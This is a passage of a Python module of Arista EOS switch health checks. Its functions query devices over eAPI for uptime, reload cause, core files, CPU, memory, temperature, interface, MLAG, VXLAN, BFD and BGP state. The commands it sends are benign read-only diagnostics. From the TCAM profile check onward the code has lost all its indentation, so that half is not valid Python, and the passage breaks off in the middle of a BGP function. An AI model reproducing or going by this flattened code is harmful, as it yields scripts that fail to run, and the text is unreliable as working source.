               'DCS-7050SX-72',
               'DCS-7050SX-72Q',
               'DCS-7050SX2-72Q',
               'DCS-7050SX-96',
               'DCS-7050SX2-128',
               'DCS-7050QX-32S',
               'DCS-7050QX2-32S',
               'DCS-7050SX3-48YC12',
               'DCS-7050CX3-32S',
               'DCS-7060CX-32S',
               'DCS-7060CX2-32S',
               'DCS-7060SX2-48YC6',
               'DCS-7160-48YC6',
               'DCS-7160-48TC6',
               'DCS-7160-32CQ',
               'DCS-7280SE-64',
               'DCS-7280SE-68',
               'DCS-7280SE-72',
               'DCS-7150SC-24-CLD',
               'DCS-7150SC-64-CLD',
               'DCS-7020TR-48',
               'DCS-7020TRA-48',
               'DCS-7020SR-24C2',
               'DCS-7020SRG-24C2',
               'DCS-7280TR-48C6',
               'DCS-7280TRA-48C6',
               'DCS-7280SR-48C6',
               'DCS-7280SRA-48C6',
               'DCS-7280SRAM-48C6',
               'DCS-7280SR2K-48C6-M',
               'DCS-7280SR2-48YC6',
               'DCS-7280SR2A-48YC6',
               'DCS-7280SRM-40CX2',
               'DCS-7280QR-C36',
               'DCS-7280QRA-C36S']
    variants = ['-SSD-F',
                '-SSD-R',
                '-M-F',
                '-M-R',
                '-F',
                '-R']
    try:
        model = response[0]['modelName']
        for variant in variants:
            model = model.replace(variant, '')
        if model not in devices:
            return True
        for component in response[0]['details']['components']:
            if component['name'] == 'Aboot':
                aboot_version = component['version'].split('-')[2]
        if aboot_version.startswith('4.0.') and int(aboot_version.split('.')[2]) < 7:
            return False
        if aboot_version.startswith('4.1.') and int(aboot_version.split('.')[2]) < 1:
            return False
        if aboot_version.startswith('6.0.') and int(aboot_version.split('.')[2]) < 9:
            return False
        if aboot_version.startswith('6.1.') and int(aboot_version.split('.')[2]) < 7:
            return False
        return True
    except KeyError:
        return None


def verify_uptime(device, enable_password, minimum = None):
    """
    Verifies the device uptime is higher than a value.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
        minimum (int): Minimum uptime in seconds.
    Returns:
        bool: `True` if the device uptime is higher than the threshold.
        `False` otherwise.
    """
    if not minimum:
        return None
    try:
        response = device.runCmds(1, ['show uptime'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['upTime'] > minimum:
            return True
        return False
    except KeyError:
        return None
def verify_reload_cause(device, enable_password):
    """
    Verifies the last reload of the device was requested by a user.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device last reload was requested by a user.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show version', 'show reload cause'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        # 'show reload cause' is the second command in the list, so its output
        # is in response[1]; the original indexed response[0] ('show version'),
        # which has no 'resetCauses' key.
        if response[1]['resetCauses'][0]['description'] == 'Reload requested by the user.':
            return True
        return False
    except KeyError:
        return None
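
# For reference, the 'show reload cause' payload consulted above looks roughly
# like (shape inferred from the lookup performed in the function):
#   {'resetCauses': [{'description': 'Reload requested by the user.', ...}], ...}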
def verify_coredump(device, enable_password):
    """
    Verifies there is no core file.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device has no core file. `False` otherwise.
    """
    try:
        response = device.runCmds(1, \
            [{"cmd": "enable", "input": enable_password}, 'bash timeout 10 ls /var/core'], 'text')
    except jsonrpc.AppError:
        return None
    try:
        if len(response[1]['output']) == 0:
            return True
        return False
    except KeyError:
        return None


def verify_agent_logs(device, enable_password):
    """
    Verifies there is no agent crash reported on the device.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device has no agent crash reported.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show agent logs crash'], 'text')
    except jsonrpc.AppError:
        return None
    try:
        if len(response[0]['output']) == 0:
            return True
        return False
    except KeyError:
        return None


def verify_syslog(device, enable_password):
    """
    Verifies the device had no syslog message with a severity of warning (or a more severe message)
    during the last 7 days.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device had no syslog message with a severity of warning (or a more severe message)
        during the last 7 days.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show logging last 7 days threshold warnings'], 'text')
    except jsonrpc.AppError:
        return None
    try:
        if len(response[0]['output']) == 0:
            return True
        return False
    except KeyError:
        return None


def verify_cpu_utilization(device, enable_password):
    """
    Verifies the CPU utilization is less than 75%.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device CPU utilization is less than 75%.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show processes top once'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['cpuInfo']['%Cpu(s)']['idle'] > 25:
            return True
        return False
    except KeyError:
        return None


def verify_memory_utilization(device, enable_password):
    """
    Verifies the memory utilization is less than 75%.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device memory utilization is less than 75%.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show version'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if float(response[0]['memFree']) / float(response[0]['memTotal']) > 0.25:
            return True
        return False
    except KeyError:
        return None


def verify_filesystem_utilization(device, enable_password):
    """
    Verifies each partition on the disk is used less than 75%.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if each partition on the disk is used less than 75%.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, \
            [{"cmd": "enable", "input": enable_password}, 'bash timeout 10 df -h'], 'text')
    except jsonrpc.AppError:
        return None
    try:
        for line in response[1]['output'].split('\n')[1:]:
            if 'loop' not in line and len(line) > 0:
                if int(line.split()[4].replace('%', '')) > 75:
                    return False
        return True
    except KeyError:
        return None
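
# The parsing above relies on the standard 'df -h' column order, e.g.
#   Filesystem  Size  Used  Avail  Use%  Mounted on
# so line.split()[4] is the 'Use%' column with its '%' sign stripped.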
def verify_transceivers_manufacturers(device, enable_password, manufacturers = None):
    """
    Verifies the device is only using transceivers from supported manufacturers.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
        manufacturers (list): List of allowed transceivers manufacturers.
    Returns:
        bool: `True` if the device is only using transceivers from supported manufacturers.
        `False` otherwise.
    """
    if not manufacturers:
        return None
    try:
        response = device.runCmds(1, ['show inventory'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        for interface in response[0]['xcvrSlots']:
            if response[0]['xcvrSlots'][interface]['mfgName'] not in manufacturers:
                return False
        return True
    except KeyError:
        return None


def verify_system_temperature(device, enable_password):
    """
    Verifies the device temperature is currently OK
    and the device did not report any temperature alarm in the past.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the device temperature is OK.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show system environment temperature'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['systemStatus'] != 'temperatureOk':
            return False
        return True
    except KeyError:
        return None


def verify_transceiver_temperature(device, enable_password):
    """
    Verifies the transceivers temperature is currently OK
    and the device did not report any alarm in the past for its transceivers temperature.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the transceivers temperature of the device is currently OK
        and if the device did not report any alarm in the past for its transceivers temperature.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show system environment temperature transceiver'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        for sensor in response[0]['tempSensors']:
            if sensor['hwStatus'] != 'ok' or sensor['alertCount'] != 0:
                return False
        return True
    except KeyError:
        return None


def verify_environment_cooling(device, enable_password):
    """
    Verifies the fans status is OK.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the if the fans status is OK.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show system environment cooling'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['systemStatus'] != 'coolingOk':
            return False
        return True
    except KeyError:
        return None


def verify_environment_power(device, enable_password):
    """
    Verifies the power supplies status is OK.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if the power supplies is OK.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show system environment power'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        for powersupply in response[0]['powerSupplies']:
            if response[0]['powerSupplies'][powersupply]['state'] != 'ok':
                return False
        return True
    except KeyError:
        return None


def verify_zerotouch(device, enable_password):
    """
    Verifies ZeroTouch is disabled.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if ZeroTouch is disabled.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, ['show zerotouch'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['mode'] == 'disabled':
            return True
        return False
    except KeyError:
        return None


def verify_running_config_diffs(device, enable_password):
    """
    Verifies there is no difference between the running-config and the startup-config.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
    Returns:
        bool: `True` if there is no difference between the running-config and the startup-config.
        `False` otherwise.
    """
    try:
        response = device.runCmds(1, \
            [{"cmd": "enable", "input": enable_password}, 'show running-config diffs'], 'text')
    except jsonrpc.AppError:
        return None
    try:
        if len(response[1]['output']) == 0:
            return True
        return False
    except KeyError:
        return None


def verify_unified_forwarding_table_mode(device, enable_password, mode = None):
    """
    Verifies the device is using the expected Unified Forwarding Table mode.
    Args:
        device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
        with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
        enable_password (str): Enable password.
        mode (int): The expected Unified Forwarding Table mode.
    Returns:
        bool: `True` if the device is using the expected Unified Forwarding Table mode.
        `False` otherwise.
    """
    if not mode:
        return None
    try:
        response = device.runCmds(1, ['show platform trident forwarding-table partition'], 'json')
    except jsonrpc.AppError:
        return None
    try:
        if response[0]['uftMode'] == str(mode):
            return True
        return False
    except KeyError:
        return None
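
# Example (a sketch): on Trident-based platforms the UFT mode is reported as a
# small integer, so a call typically looks like
#   verify_unified_forwarding_table_mode(device, enable_password, mode=3)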
def verify_tcam_profile(device, enable_password, profile):
"""
Verifies the configured TCAM profile is the expected one.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
profile (str): The expected TCAM profile.
Returns:
bool: `True` if the device is configured with the expected TCAM profile.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show hardware tcam profile'], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['pmfProfiles']['FixedSystem']['status'] == response[0]['pmfProfiles']['FixedSystem']['config'])\
and (response[0]['pmfProfiles']['FixedSystem']['status'] == profile):
return True
return False
except KeyError:
return None
def verify_adverse_drops(device, enable_password):
"""
Verifies there are no adverse drops on DCS-7280E and DCS-7500E switches.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device (DCS-7280E or DCS-7500E) does not report adverse drops.
`False` if the device (DCS-7280E or DCS-7500E) reports adverse drops.
"""
try:
response = device.runCmds(1, ['show hardware counter drop'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['totalAdverseDrops'] == 0:
return True
return False
except KeyError:
return None
def verify_ntp(device, enable_password):
"""
Verifies NTP is synchronised.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if NTP is synchronised. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show ntp status'], 'text')
except jsonrpc.AppError:
return None
try:
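# EOS prints 'synchronised' (British spelling) as the first word of the first output line when NTP is in sync.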
if response[0]['output'].split('\n')[0].split(' ')[0] == 'synchronised':
return True
return False
except KeyError:
return None
def verify_interface_utilization(device, enable_password):
"""
Verifies interface utilization is below 75%.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if interface utilization is below 75%. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters rates'], 'text')
except jsonrpc.AppError:
return None
try:
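# Skip the header line; the input and output utilization columns sit at the 5th-from-last
# and 2nd-from-last fields, and '-' marks an interface with no rate data to check.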
for line in response[0]['output'].split('\n')[1:]:
if len(line) > 0:
if line.split()[-5] == '-' or line.split()[-2] == '-':
pass
elif float(line.split()[-5].replace('%', '')) > 75.0:
return False
elif float(line.split()[-2].replace('%', '')) > 75.0:
return False
return True
except KeyError:
return None
def verify_interface_errors(device, enable_password):
"""
Verifies the interface error counters are equal to zero.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interface error counters are equal to zero.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters errors'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaceErrorCounters']:
for counter in response[0]['interfaceErrorCounters'][interface]:
if response[0]['interfaceErrorCounters'][interface][counter] != 0:
return False
return True
except KeyError:
return None
def verify_interface_discards(device, enable_password):
"""
Verifies the interface packet discard counters are equal to zero.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interface packet discard counters are equal to zero.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters discards'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaces']:
for counter in response[0]['interfaces'][interface]:
if response[0]['interfaces'][interface][counter] != 0:
return False
return True
except KeyError:
return None
def verify_interface_errdisabled(device, enable_password):
"""
Verifies there is no interface in the errdisabled state.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no interface in the errdisabled state.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces status'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaceStatuses']:
if response[0]['interfaceStatuses'][interface]['linkStatus'] == 'errdisabled':
return False
return True
except KeyError:
return None
def verify_interfaces_status(device, enable_password, minimum = None):
"""
Verifies the number of Ethernet interfaces up/up on the device is greater than or equal to a value.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
minimum (int): Expected minimum number of Ethernet interfaces up/up
Returns:
bool: `True` if the number of Ethernet interfaces up/up on the device is greater than
or equal to the provided value.
`False` otherwise.
"""
if not minimum:
return None
try:
response = device.runCmds(1, ['show interfaces description'], 'json')
except jsonrpc.AppError:
return None
nbr = 0
try:
for item in response[0]['interfaceDescriptions']:
if ('Ethernet' in item) \
and (response[0]['interfaceDescriptions'][item]['lineProtocolStatus'] == 'up')\
and (response[0]['interfaceDescriptions'][item]['interfaceStatus'] == 'up'):
nbr = nbr + 1
if nbr >= minimum:
return True
return False
except KeyError:
return None
def verify_storm_control_drops(device, enable_password):
"""
Verifies the device did not drop packets due to its storm-control configuration.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device did not drop packets due to its storm-control configuration.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show storm-control'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaces']:
for traffic_type in ['all', 'unknown-unicast', 'multicast', 'broadcast']:
if traffic_type in response[0]['interfaces'][interface]["trafficTypes"]:
if 'drop' in response[0]['interfaces'][interface]["trafficTypes"][traffic_type] \
and response[0]['interfaces'][interface]["trafficTypes"][traffic_type]['drop'] != 0:
return False
return True
except KeyError:
return None
def verify_portchannels(device, enable_password):
"""
Verifies there is no inactive port in port channels.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no inactive port in port channels.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show port-channel'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['portChannels']) == 0:
return None
for portchannel in response[0]['portChannels']:
if len(response[0]['portChannels'][portchannel]['inactivePorts']) != 0:
return False
return True
except KeyError:
return None
def verify_illegal_lacp(device, enable_password):
"""
Verifies no illegal LACP packets have been received.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if no illegal LACP packets have been received.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show lacp counters all-ports'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['portChannels']) == 0:
return None
for portchannel in response[0]['portChannels']:
for interface in response[0]['portChannels'][portchannel]['interfaces']:
if response[0]['portChannels'][portchannel]['interfaces'][interface]['illegalRxCount'] != 0:
return False
return True
except KeyError:
return None
def verify_mlag_status(device, enable_password):
"""
Verifies the MLAG status:
state is active, negotiation status is connected, local int is up, peer link is up.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the MLAG status is OK.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['state'] == 'disabled':
return None
if response[0]['state'] != 'active':
return False
if response[0]['negStatus'] != 'connected':
return False
if response[0]['localIntfStatus'] != 'up':
return False
if response[0]['peerLinkStatus'] != 'up':
return False
return True
except KeyError:
return None
def verify_mlag_interfaces(device, enable_password):
"""
Verifies there are no inactive or active-partial MLAG interfaces.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there are no inactive or active-partial MLAG interfaces.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['state'] == 'disabled':
return None
if response[0]['mlagPorts']['Inactive'] != 0:
return False
if response[0]['mlagPorts']['Active-partial'] != 0:
return False
return True
except KeyError:
return None
def verify_mlag_config_sanity(device, enable_password):
"""
Verifies there are no MLAG config-sanity warnings.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there are no MLAG config-sanity warnings.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag config-sanity'],'json')
except jsonrpc.AppError:
return None
try:
if response[0]['response']['mlagActive'] is False:
# MLAG isn't running
return None
if len(response[0]['response']['globalConfiguration']) > 0 or \
len(response[0]['response']['interfaceConfiguration']) > 0:
return False
return True
except KeyError:
return None
def verify_loopback_count(device, enable_password, number = None):
"""
Verifies the number of loopback interfaces on the device is the one we expect
and that none of the loopback interfaces is down.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): Expected number of loopback interfaces.
Returns:
bool: `True` if the number of loopback interfaces is the expected one and none of them is down.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show ip interface brief | include Loopback'], 'text')
except jsonrpc.AppError:
return None
try:
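# Each loopback prints on its own newline-terminated line, so the newline count gives the
# interface count; any 'down' keyword flags a loopback that is not up.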
if (response[0]['output'].count('\n') == number) and (response[0]['output'].count('down') == 0):
return True
return False
except KeyError:
return None
def verify_vxlan(device, enable_password):
"""
Verifies the interface vxlan 1 status is up/up.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interface vxlan 1 status is up/up.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces description | include Vx1'], 'text')
except jsonrpc.AppError:
return None
try:
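# The filtered description line contains 'up' twice (line protocol and interface status) when Vxlan1 is up/up.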
if response[0]['output'].count('up') == 2:
return True
return False
except KeyError:
return None
def verify_vxlan_config_sanity(device, enable_password):
"""
Verifies there are no VXLAN config-sanity warnings.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there are no VXLAN config-sanity warnings.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show vxlan config-sanity'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['categories']) == 0:
return None
for category in response[0]['categories']:
if category in ['localVtep', 'mlag']:
if response[0]['categories'][category]['allCheckPass'] is not True:
return False
return True
except KeyError:
return None
def verify_svi(device, enable_password):
"""
Verifies there is no interface vlan down.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no interface vlan down. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show ip interface brief | include Vl'], 'text')
except jsonrpc.AppError:
return None
try:
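# Any 'down' keyword in the filtered output indicates an SVI that is not up/up.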
if response[0]['output'].count('down') == 0:
return True
return False
except KeyError:
return None
def verify_spanning_tree_blocked_ports(device, enable_password):
"""
Verifies there are no spanning-tree blocked ports.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there are no spanning-tree blocked ports.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show spanning-tree blockedports'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['spanningTreeInstances']) == 0:
return True
return False
except KeyError:
return None
def verify_routing_protocol_model(device, enable_password, model = None):
"""
Verifies the configured routing protocol model is the one we expect
and that there is no mismatch between the configured and operating routing protocol model.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
model(str): Expected routing protocol model (multi-agent or ribd).
Returns:
bool: `True` if the configured routing protocol model is the one we expect
and there is no mismatch between the configured and operating routing protocol model.
`False` otherwise.
"""
if not model:
return None
try:
response = device.runCmds(1, [{'cmd': 'show ip route summary', 'revision': 3}], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['protoModelStatus']['configuredProtoModel'] == response[0]['protoModelStatus']['operatingProtoModel']) \
and (response[0]['protoModelStatus']['operatingProtoModel'] == model):
return True
return False
except KeyError:
return None
def verify_routing_table_size(device, enable_password, minimum = None, maximum = None):
"""
Verifies the size of the IP routing table (default VRF)
is between the two provided thresholds.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
minimum(int): Expected minimum routing table (default VRF) size.
maximum(int): Expected maximum routing table (default VRF) size.
Returns:
bool: `True` if the size of the IP routing table (default VRF) is between two thresholds.
`False` otherwise.
"""
if minimum is None or maximum is None:  # 0 is a legitimate threshold, so test explicitly for None
return None
try:
response = device.runCmds(1, [{'cmd': 'show ip route summary', 'revision': 3}], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['vrfs']['default']['totalRoutes'] >= minimum) \
and (response[0]['vrfs']['default']['totalRoutes'] <= maximum):
return True
return False
except KeyError:
return None
def verify_bfd(device, enable_password):
"""
Verifies there is no BFD peer in down state (all VRFs, IPv4 neighbors).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no BFD peer in down state (all VRFs, IPv4 neighbors, single-hop).
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bfd peers'], 'json')
except jsonrpc.AppError:
return None
try:
for vrf in response[0]['vrfs']:
for neighbor in response[0]['vrfs'][vrf]['ipv4Neighbors']:
for interface in response[0]['vrfs'][vrf]['ipv4Neighbors'][neighbor]['peerStats']:
if response[0]['vrfs'][vrf]['ipv4Neighbors'][neighbor]['peerStats'][interface]['status'] != 'up':
return False
return True
except KeyError:
return None
def verify_bgp_ipv4_unicast_state(device, enable_password):
"""
Verifies all IPv4 unicast BGP sessions are established (for all VRFs)
and all BGP message queues for these sessions are empty (for all VRFs).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all IPv4 unicast BGP sessions are established (for all VRFs)
and all BGP message queues for these sessions are empty (for all VRFs).
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp ipv4 unicast summary vrf all'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']) == 0:
return None
for vrf in response[0]['vrfs']:
for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) \
or (response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
return True
except KeyError:
return None
def verify_bgp_ipv4_unicast_count(device, enable_password, number, vrf = 'default'):
"""
Verifies all IPv4 unicast BGP sessions are established,
all BGP message queues for these sessions are empty,
and the actual number of BGP IPv4 unicast neighbors is the one we expect.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): Expected number of BGP IPv4 unicast neighbors
vrf(str): VRF to verify.
Returns:
bool: `True` if all IPv4 unicast BGP sessions are established,
if all BGP message queues for these sessions are empty,
and if the actual number of BGP IPv4 unicast neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
if not vrf:
return None
count = 0
command = 'show bgp ipv4 unicast summary vrf ' + vrf
try:
response = device.runCmds(1, [command], 'json')
except jsonrpc.AppError:
return None
try:
